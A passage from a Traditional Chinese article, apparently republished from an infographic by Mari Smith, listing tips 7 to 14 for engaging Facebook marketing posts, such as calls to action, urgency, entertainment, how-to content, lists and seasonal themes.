人們之所以成為你的粉絲和朋友,是因為他們喜歡你做的事。因此你在Facebook上的聲音必須忠於你的品牌。
用真實的聲音在貼文中

7. 加上召喚行動的提示

如果你請粉絲分享、按讚或留言,他們比較更有可能會照做。
加上召喚行動的提示

8. 有創意地使用APP

比賽和推廣用的app,以及表格、民調等,可以加深粉絲跟企業或品牌之間的參與感。
創意使用APP

9. 讓人有緊迫感

貼文內容可以包含一些即時性的訣竅、花招、和即時消除迷思(Facebook上的迷思尤其猖獗)。
貼文讓人有緊迫感

10. 提供價值

在Facebook上分享任何東西前,先問問自己:你的粉絲會從內容中得到有價值的東西嗎?
貼文要提供價值

11. 富娛樂性

如果你的粉絲喜歡有趣的迷因 memes (註: meme 指的是一些風格獨特的圖像或影片,搭配上被社群接受的標語或口號,然後在病毒式的傳播下,產生許多變形和二次創作的產物。最近流行的Harlem Shake哈林搖就是meme的一種),或對影片的反應很好,那就使用最適合你的受眾的媒體類型吧。
貼文要有娛樂性

12.富教學性

人們都喜歡分享 how-to 指南和要訣等內容。提示:從Facebook連結到更詳盡的內容是很簡單的事。
提問要富教學性

13. 製作清單

資訊圖表或PDF模式的清單,是很好的、可供分享的內容。一些常見的被分享多次的內容標題包括:“7種…的方法”、或“10樣…的東西”。
在貼文中列一個清單

14. 有季節性

還要特別製作跟季節或將至的節日有關的內容。
貼文有季節性

完整資訊圖表:Mari Smith Infographic
轉載自《inbound journals》